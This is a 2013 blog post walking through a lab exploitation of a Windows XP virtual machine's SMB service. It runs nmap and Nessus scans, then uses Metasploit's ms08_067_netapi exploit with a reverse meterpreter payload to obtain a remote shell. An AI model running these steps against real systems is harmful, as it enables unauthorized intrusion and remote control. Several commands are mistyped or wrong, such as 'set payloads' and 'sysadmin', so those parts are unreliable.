Tuesday, 2 April 2013

Exploit smb service in windows xp


In previous chapter i talked about information gathering and service enumeration. now let's go to the next level. this time i will write about my experiment how to exploit one of windows service : smb service. i am still using backtrack 5 R3 as a attacking tools and windows xp installed in virtualbox as an experiment lab.

here's the steps to exploit system in windows xp :

  1. information gathering, using nmap
  2. service enumeration and vurnerability assesment, using nessus
  3. exploitation, using metasploit framework
now let's get started. firstly turn on windows xp in virtual box and make sure backtrack and windows xp is connected using ping


next step, do the information gathering using nmap, in menu backtrack > information gathering > network analysis > network scanners > nmap

nmap -A 192.168.56.101

from nmap we get information about OS version, services and open ports. i'll process this data to get more detailed information about the open ports. using nessus (if you can't find in backtrack menu, you must install and register your username first).

type 127.0.0.1:8834 in web browser and login with your account. after logged in, click the menu scan and fill out the form :
name : anything you want
type : just choose run now to begin scanning immediately
policy : choose your type of network
scan target : your target's address
target file : (optional)

click launch to begin the scan. 

wait for a while, and after completed click the result :


from the result we can see the vulnerabilities and the rank from low, medium and high. now we choose the service that has a high vulnerability, in this case is port 445 with 2 high vulnerable. 


we can see there are 2 service that have high vulnerability, the smb and RPC. click the smb service for a detailed information.


from detailed information we can see that this service is highly vulnerable and can be exploited with metasploit. 

now let's begin the penetration using metasploit. in menu backtrack > exploitation tools > network exploitation tools > metasploit framework > msfconsole

to search the exploit modules type search platform:windows type:exploit osvd:48153 path:exploit/windows/smb



here's the results, just choose the great or excellent one. in this case i will use exploit/windows/smb/ms08_067_netapi.



to know the option needed type : show option.



RHOST is target host, use the target IP address by typing : set RHOST 192.168.56.101. to begin penetration we must use the payload (bad script). there are plenty of payloads available and ready to use, just choose one of them. 



to show all avalable payloads just type: show payloads. 



in this case i will use payload windows/meterpreter/reverse_http. to use it type: set payloads windows/meterpreter/reverse_http.
the metasploit will request for LHOST, just type: set LHOST 192.168.56.1 to use your IP address as a LHOST.



to begin exploitation just type exploit and hit enter. if succcessfully, the meterpreter shell will appear.
to make sure that you have been succesfully enter the system type : sysadmin


and voila! the system is successfully penetrated and ready to be controlled.

to end the exploitation session just type exit and hit enter.





Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)